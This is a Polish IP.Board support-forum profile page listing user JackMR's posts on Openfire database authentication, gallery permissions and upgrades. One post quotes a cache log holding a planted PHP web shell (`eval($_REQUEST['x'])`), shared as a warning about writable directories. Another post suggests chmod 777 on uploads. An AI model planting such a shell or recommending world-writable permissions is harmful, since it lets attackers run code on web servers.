Jump to content

JackMR

Member
 • Posts

  179
 • Joined

 • Last visited

About JackMR

 • Birthday 11/13/1975

Informacje o forum

 • Wersja
  IP.Board 3.4.6
 • Forum
  polishbanditcrew.pl

Kontakt

 • Gadu Gadu
  5632613

Informacje o profilu

 • Miejscowość
  Rzym

JackMR's Achievements

Newbie

Newbie (1/14)

40

Reputation

 1. ja przedłużyłem moją przedwczoraj 24.02.2014: więc mi też coś ten wrzesień nie bardzo pasuje
 2. Witajcie, Chcąc "rozszerzyć" moje community o nowe funkcje zainstalowałem na dedyku OpenFire http://www.igniterealtime.org/projects/openfire/index.jsp OpenFire jest to serwer instant messagging który może posługiwać się zewnętrzną bazą danych w celu autentykacji użytkownika (read-only). Konfiguracja odbywa się w ten sposób: <jive> ... <provider> <auth> <className>org.jivesoftware.openfire.auth.JDBCAuthProvider</className> </auth> <user> <className>org.jivesoftware.openfire.user.JDBCUserProvider</className> </user> </provider> <jdbcAuthProvider> <passwordSQL>SELECT password FROM user_account WHERE username=?</passwordSQL> <passwordType>plain</passwordType> </jdbcAuthProvider> <jdbcUserProvider> <loadUserSQL>SELECT name,email FROM myUser WHERE username=?</loadUserSQL> <userCountSQL>SELECT COUNT(*) FROM myUser</userCountSQL> <allUsersSQL>SELECT username FROM myUser</allUsersSQL> <searchSQL>SELECT username FROM myUser WHERE</searchSQL> <usernameField>username</usernameField> <nameField>name</nameField> <emailField>email</emailField> </jdbcUserProvider> ... </jive> Oczywiście jest to tylko przykład a mój problem polega na ułożeniu w odpowiedni sposób zapytań do bazy IPB 3.4.6 1. hasło: SELECT password FROM user_account WHERE username=? 2. typ hasła (pewnie będzie md5) 3. user: SELECT name,email FROM myUser WHERE username=? 4. user count: SELECT COUNT(*) FROM myUser 5. wyszukiwanie usera: SELECT username FROM myUser 6. wyszukiwanie: SELECT username FROM myUser WHERE Poczytałem trochę http://www.igniterealtime.org/builds/openfire/docs/latest/documentation/db-integration-guide.html ale jak wiadomo IPB nie trzyma hasel w plain text tylko: Gdyby to był plain text to pewnie byłoby to proste: <passwordSQL>SELECT members_pass_hash FROM members WHERE members_l_username=?</passwordSQL> ale nie wiem jak złożyć takie zapytanie biorąc pod uwagę sposób w jaki przechowuje hasła IPB. Doradzicie jak napisać te zapytania ?
 3. nie wiem Portek, której litery w słowie hosting nie zrozumiałeś mówiąc o iptables Jeżeli pisze hosting to na pewno nie jest VPS..
 4. jaki by nie był.... => jak już teraz zdycha do głupich F5 (do autora: sorry, ale nie wiem na jakiej podstawie wysnuwasz wnioski, że ktoś Ci F5 napitala - analizowałeś logi apacza?), to i tak trzeba zmienić lub iść w dedyka. IPB to nie phpbb by przemo i "pić zasoby musi"
 5. dodam tylko, że jak wejdę w ACP w "Zarządzanie maskami uprawnień" i chcę edytować maskę danej grupy to nie mam zakładki "Gallery":
 6. a jakie prawa ma samo uploads ? daj mu tez 777 na poczatek a potem sprobuj z 755 zaleznie od ustawien hostingu i usera ktorym pisze apacz
 7. dzięki za rozwinięcie tematu. Dzisiaj "otwieram" głosowanie na fotki konkursowe u siebie na forum ale niestety wrrrrrr niektóre grupy nie mogą głosować. Wygląda to tak: grupa która może głosować: a tu ta sama fotka z widoku grupy która nie może: Pytanie za 100pkt - gdzie mam tego diabelnego ustawienia szukać ? Siedzę nad tym od rana i krew mnie zalewa.. Galeria to v4.2.1 a IPB3.2.3 Please Help ?
 8. łatki założone... w /cache miałem: more cache/bc.php ============================================================================== URL: /index.php/index.php Date: Sat, 03 Nov 2012 09:05:00 +0000 IP Address: 50.30.47.87 Time Taken: 0.00015 <?php eval($_REQUEST['x']); ?> ============================================================================== ============================================================================== ========================= END =================================== ========================= /index.php? =================================== ============================================================================== ============================================================================== URL: /index.php/index.php Date: Sat, 03 Nov 2012 09:05:00 +0000 IP Address: 50.30.47.87 Time Taken: 8.0E-5 <?php eval($_REQUEST['x']); ?> ============================================================================== ============================================================================== ========================= END =================================== ========================= /index.php? =================================== ============================================================================== ale wg.mnie niedopuszczalne jest, że pehap sobie pisze po głównym katalogu.. Jeśli tak jest to znaczy, że w każdej chwili średnio inteligentny script-kid może Wam podmienić index.php Weźcie sobie sprawdźcie dobrze prawa do Waszych głównych folderów. Tym bardziej, że w dzisiejszych czasach nie istnieje żaden soft komercyjny który wymaga praw pisania w głownym katalgou public html..
 9. no świetnie, ale jak w takim razie mogę zabronić/zezwolić userom na "rejtowanie" fotek ? z którego miejsca ACP ? Bo ja mam wciąż wrażenie, że spolszczenie ACP nafikało mi takie figle.. Jak wrócić do "stockowego" angielskiego ACP ?
 10. DawPi miałeś nosa.. jak pisałem wcześniej nie miałem w ogóle folderu classes. Dorzuciłem go z zipka i przy okazji jeszcze raz wrzuciłem wszystkie pliki z opcją "SkipAll" w FTP o ile plik na serwerze istnieje. Nie mam pojęcia jak mógł się nie wgrać ftpem, a tym bardziej jak http://URLdoACP/upgrade nic nie powiedział przy upgradzie wersji jak go nie było.. ech.. Anyway, pliki dorzuciłem, Twój "workaround" zrobiłem i jest malina - głosować nie można. Jak na razie - wystarczy póki trwa zbiórka fotek do konkursu. Dzięki!! Obejrzałem tego screena i wątek ale za psią kość nie mogę znaleźć w ACP tego o czym piszesz: IP Gallery-->Category Manager-->(Po prawej) "Edit Settings" - i zakładka "Permissions" Tak samo dziwi mnie fakt, że jak w poście 5 http://forum.invisio...ie/#entry212603 nie mam zakładki dotyczącej uprwanień grupy w Galeri.. ?
 11. działa!!!! Podziękowali !!!
×
×
 • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.